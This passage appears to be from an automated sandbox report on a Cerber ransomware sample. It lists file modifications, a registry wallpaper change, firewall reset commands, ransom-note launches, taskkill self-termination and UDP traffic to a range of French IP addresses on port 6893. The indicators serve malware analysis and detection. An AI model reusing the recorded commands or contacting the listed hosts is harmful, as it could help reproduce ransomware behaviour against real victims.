| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\documents | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\desktop | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp2EBE.bmp" | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\program files (x86)\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files\ | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\ | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\ | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\documents | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\desktop | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\desktop | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\documents | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WK6IB3_.hta"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VBTJZKN_.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "cerber.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
Network
| Country | Destination | Domain | Proto |
| FR | 178.33.158.0:6893 | udp | |
| FR | 178.33.158.1:6893 | udp | |
| FR | 178.33.158.2:6893 | udp | |
| FR | 178.33.158.3:6893 | udp | |
| FR | 178.33.158.4:6893 | udp | |
| FR | 178.33.158.5:6893 | udp | |
| FR | 178.33.158.6:6893 | udp | |
| FR | 178.33.158.7:6893 | udp | |
| FR | 178.33.158.8:6893 | udp | |
| FR | 178.33.158.9:6893 | udp | |
| FR | 178.33.158.10:6893 | udp | |
| FR | 178.33.158.11:6893 | udp | |
| FR | 178.33.158.12:6893 | udp | |
| FR | 178.33.158.13:6893 | udp | |
| FR | 178.33.158.14:6893 | udp | |
| FR | 178.33.158.15:6893 | udp | |
| FR | 178.33.158.16:6893 | udp | |
| FR | 178.33.158.17:6893 | udp | |
| FR | 178.33.158.18:6893 | udp | |
| FR | 178.33.158.19:6893 | udp | |
| FR | 178.33.158.20:6893 | udp | |
| FR | 178.33.158.21:6893 | udp | |
| FR | 178.33.158.22:6893 | udp | |
| FR | 178.33.158.23:6893 | udp | |
| FR | 178.33.158.24:6893 | udp | |
| FR | 178.33.158.25:6893 | udp | |
| FR | 178.33.158.26:6893 | udp | |
| FR | 178.33.158.27:6893 | udp | |
| FR | 178.33.158.28:6893 | udp | |
| FR | 178.33.158.29:6893 | udp | |
| FR | 178.33.158.30:6893 | udp | |
| FR | 178.33.158.31:6893 | udp | |
| FR | 178.33.159.0:6893 | udp | |
| FR | 178.33.159.1:6893 | udp | |
| FR | 178.33.159.2:6893 | udp | |
| FR | 178.33.159.3:6893 | udp | |
| FR | 178.33.159.4:6893 | udp | |
| FR | 178.33.159.5:6893 | udp | |
| FR | 178.33.159.6:6893 | udp | |
| FR | 178.33.159.7:6893 | udp | |
| FR | 178.33.159.8:6893 | udp | |
| FR | 178.33.159.9:6893 | udp | |
| FR | 178.33.159.10:6893 | udp | |
| FR | 178.33.159.11:6893 | udp | |
| FR | 178.33.159.12:6893 | udp | |
| FR | 178.33.159.13:6893 | udp | |
| FR | 178.33.159.14:6893 | udp | |
| FR | 178.33.159.15:6893 | udp | |
| FR | 178.33.159.16:6893 | udp | |
| FR | 178.33.159.17:6893 | udp | |
| FR | 178.33.159.18:6893 | udp | |
| FR | 178.33.159.19:6893 | udp | |
| FR | 178.33.159.20:6893 | udp | |
| FR | 178.33.159.21:6893 | udp | |
| FR | 178.33.159.22:6893 | udp | |
| FR | 178.33.159.23:6893 | udp | |
| FR | 178.33.159.24:6893 | udp | |
| FR | 178.33.159.25:6893 | udp | |
| FR | 178.33.159.26:6893 | udp | |
| FR | 178.33.159.27:6893 | udp | |
| FR | 178.33.159.28:6893 | udp | |
| FR | 178.33.159.29:6893 | udp | |
| FR | 178.33.159.30:6893 | udp | |
| FR | 178.33.159.31:6893 | udp | |
| FR | 178.33.160.0:6893 | udp | |
| FR | 178.33.160.1:6893 | udp | |
| FR | 178.33.160.2:6893 | udp | |
| FR | 178.33.160.3:6893 | udp | |
| FR | 178.33.160.4:6893 | udp | |
| FR | 178.33.160.5:6893 | udp | |
| FR | 178.33.160.6:6893 | udp | |
| FR | 178.33.160.7:6893 | udp | |
| FR | 178.33.160.8:6893 | udp | |
| FR | 178.33.160.9:6893 | udp | |
| FR | 178.33.160.10:6893 | udp | |
| FR | 178.33.160.11:6893 | udp | |
| FR | 178.33.160.12:6893 | udp | |
| FR | 178.33.160.13:6893 | udp | |
| FR | 178.33.160.14:6893 | udp | |
| FR | 178.33.160.15:6893 | udp | |
| FR | 178.33.160.16:6893 | udp | |
| FR | 178.33.160.17:6893 | udp | |
| FR | 178.33.160.18:6893 | udp | |
| FR | 178.33.160.19:6893 | udp | |
| FR | 178.33.160.20:6893 | udp | |
| FR | 178.33.160.21:6893 | udp | |
| FR | 178.33.160.22:6893 | udp | |
| FR | 178.33.160.23:6893 | udp | |
| FR | 178.33.160.24:6893 | udp | |
| FR | 178.33.160.25:6893 | udp | |
| FR | 178.33.160.26:6893 | udp | |
| FR | 178.33.160.27:6893 | udp | |
| FR | 178.33.160.28:6893 | udp | |
| FR | 178.33.160.29:6893 | udp | |
| FR | 178.33.160.30:6893 | udp | |
| FR | 178.33.160.31:6893 | udp | |
| FR | 178.33.160.32:6893 | udp | |
| FR | 178.33.160.33:6893 | udp | |
| FR | 178.33.160.34:6893 | udp | |
| FR | 178.33.160.35:6893 | udp | |
| FR | 178.33.160.36:6893 | udp | |
| FR | 178.33.160.37:6893 | udp | |
| FR | 178.33.160.38:6893 | udp | |
| FR | 178.33.160.39:6893 | udp | |
| FR | 178.33.160.40:6893 | udp | |
| FR | 178.33.160.41:6893 | udp | |
| FR | 178.33.160.42:6893 | udp | |
| FR | 178.33.160.43:6893 | udp | |
| FR | 178.33.160.44:6893 | udp | |
| FR | 178.33.160.45:6893 | udp | |
| FR | 178.33.160.46:6893 | udp | |
| FR | 178.33.160.47:6893 | udp | |
| FR | 178.33.160.48:6893 | udp | |
| FR | 178.33.160.49:6893 | udp | |
| FR | 178.33.160.50:6893 | udp | |
| FR | 178.33.160.51:6893 | udp | |
| FR | 178.33.160.52:6893 | udp | |
| FR | 178.33.160.53:6893 | udp | |
| FR | 178.33.160.54:6893 | udp | |
| FR | 178.33.160.55:6893 | udp | |
| FR | 178.33.160.56:6893 | udp | |
| FR | 178.33.160.57:6893 | udp | |
| FR | 178.33.160.58:6893 | udp | |
